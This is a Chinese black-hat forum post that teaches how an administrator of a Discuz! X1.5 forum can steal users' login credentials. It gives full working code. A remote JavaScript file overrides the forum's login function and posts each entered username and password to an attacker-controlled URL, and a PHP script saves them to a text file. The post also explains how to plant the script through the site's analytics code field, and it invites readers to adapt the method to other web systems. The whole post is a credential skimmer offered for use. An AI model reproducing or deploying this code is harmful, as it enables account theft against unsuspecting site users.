黑帽SEO技术论坛|商业源码|棋牌资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
查看: 65|回复: 0

dx1.5后台权限截取用户账号密码

[复制链接]

3484

主题

3485

帖子

1万

积分

超级版主

Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18

积分
11404
发表于 2017-3-3 19:07:47 | 显示全部楼层 |阅读模式
大家都知道在各种论坛及管理系统后台都会有存放网站第三方统计代码的地方,用来统计网站流量的。
今天我要说的就是利用这里调用远程js达到截取用户账号密码的效果。
这个方法其实适用于很多web系统,而且也不止局限于截取账号密码,各位可以根据情况举一反三。
这里我拿dx1.5说下截取账号密码的原理。
首先我们来分析下dx1.5的登录表单
<form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes"><div class="fastlg cl"><span id="return_ls" style="display:none"></span>.........................//省略若干代码在表单头有个onsubmit="return lsSubmit()"事件,
就是说在点击“登录”后会先执行lsSubmit()这个js函数并返回,再提交表单。
lsSubmit()函数调用自论坛的common.js里,我们要做的就是在远程js里构造一个同样的lsSubmit()函数。
在js里,若多个函数重名,只有最后的一个会生效,而我们留在网站统计代码里的远程js在页底,
所以论坛调用lsSubmit()时,只有远程js里的lsSubmit()函数会被执行。
如此,我们就可以让远程js里的lsSubmit()执行我们想要的代码,截取账号密码。
远程js源码:
//Author:青龙(Tueur)//Blog:www.tueur.netvar _url="http://www.xxx.com/get.php";//改成你接收账号密码的php文件url地址。//构造同名函数function lsSubmit() {        if($('ls_username').value == '' || $('ls_password').value == '') {                showWindow('login', 'member.php?mod=logging&action=login');                hideWindow('register');        } else {                ajaxpost('lsform', 'return_ls', 'return_ls', 'onerror');                fuck_post(_url);//在同名函数里调用fuck_post(_url)函数来异步发送账号密码        }        return false;}/*------下面开始是ajax异步执行代码------*/var xmlHttp;function S_xmlhttprequest(){        if(window.ActiveXObject)        {                xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');        }        else if(window.XMLHttpRequest)        {                xmlHttp=new XMLHttpRequest();        }}function fuck_post(url){        //下面$('ls_username').value与$('ls_password').value分别是论坛账号密码输入框的值        var poststr='username='+$('ls_username').value+'&password='+$('ls_password').value;        S_xmlhttprequest();        xmlHttp.open("POST",url,true);        xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");        xmlHttp.send(poststr);}下面是接收账号密码并保存到pass.txt的php代码:
<?if($_POST['username']&&$_POST['password']){$content=$_POST['username'].'  '.$_POST['password']."\r\n";$of = fopen('pass.txt','a+');//把接收到的账号密码保存到pass.txt里fwrite($of,$content);fclose($of);}?>在后台网站第三方统计代码在里调用远程js的方法:<script src="url/name.js"></script>

回复

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|黑帽SEO技术论坛|商业源码|棋牌资源网  |网站地图

Powered by Discuz! X3.3© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表